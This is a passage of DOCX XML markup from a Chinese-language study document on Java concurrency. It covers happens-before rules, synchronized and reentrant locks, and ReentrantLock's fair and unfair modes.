    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程终结规则：线程中所有的操作都先行发生于线程的终止检测，我们可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread.join()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法结束、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread.isAlive()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的返回值手段检测到线程已经终止执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF42DC" w:rsidRPr="0012270B" w:rsidRDefault="00CF42DC" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象终结规则：一个对象的初始化完成先行发生于他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>finalize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法的开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序顺序规则：一个线程中的每个操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happen-before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于该线程中的任意后续操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视器锁规则：对一个锁的解锁，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happens-before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于随后对这个锁的加锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>olatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量规则：对一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域的写，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happens-before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于任意后续对这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域的读。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>传递性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A happens-beforeB ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B happens-before C,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> A happens-before C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B40B5" w:rsidRDefault="009B40B5" w:rsidP="00E378E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ThreadB.start()(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ThreadB.start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>happens-before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的任意操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00B0297D" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>1.3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="000D7239">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000D7239">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>ynchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>与可重入锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)  synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>取得的锁都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对象锁</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，而不是一段代码或方法当作锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)  A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程持有对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>锁，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程可以以异步方式调用对象中的非</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>类型的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>具有锁重入的功能，当一个线程得到一个对象锁之后，再次请求此对象锁时是可以得到该对象的锁的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>内部调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>本类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>块时，是可以得到锁的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可重入锁的概念：自己可以再次获取自己的内部锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一个线程获得某个对象的锁，此时这个对象锁还没有释放，当其再次想要获取这个对象锁的时候还是可以获取的，如果不可锁重入的话，就会造成死锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidR="0015487A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>重入锁也支持父子类继承的环境中。子类完全可以通过可重入锁调用</w:t>
      </w:r>
      <w:r w:rsidR="0015487A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>父类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的同步方法的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0297D" w:rsidRDefault="00B0297D" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>当一个线程的代码出现异常时，其所持有的锁会自动释放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DD4" w:rsidRPr="00F41A4C" w:rsidRDefault="00D30DD4" w:rsidP="00D30DD4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="008E20F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的公平</w:t>
      </w:r>
      <w:r>
        <w:t>锁与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非公平</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1ADE" w:rsidRDefault="009F1ADE" w:rsidP="00FD7951">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1914469"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="26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6" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1914469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DD4" w:rsidRDefault="00D30DD4" w:rsidP="00FD7951">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentranLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认使用非公平锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DD4" w:rsidRDefault="00D30DD4" w:rsidP="00FD7951">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isHeldByCurrentThread()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询当前线程是否保持此锁定</w:t>
      </w:r>
      <w:r w:rsidR="00FD7951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DD4" w:rsidRPr="001F775C" w:rsidRDefault="00D30DD4" w:rsidP="00FD7951">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
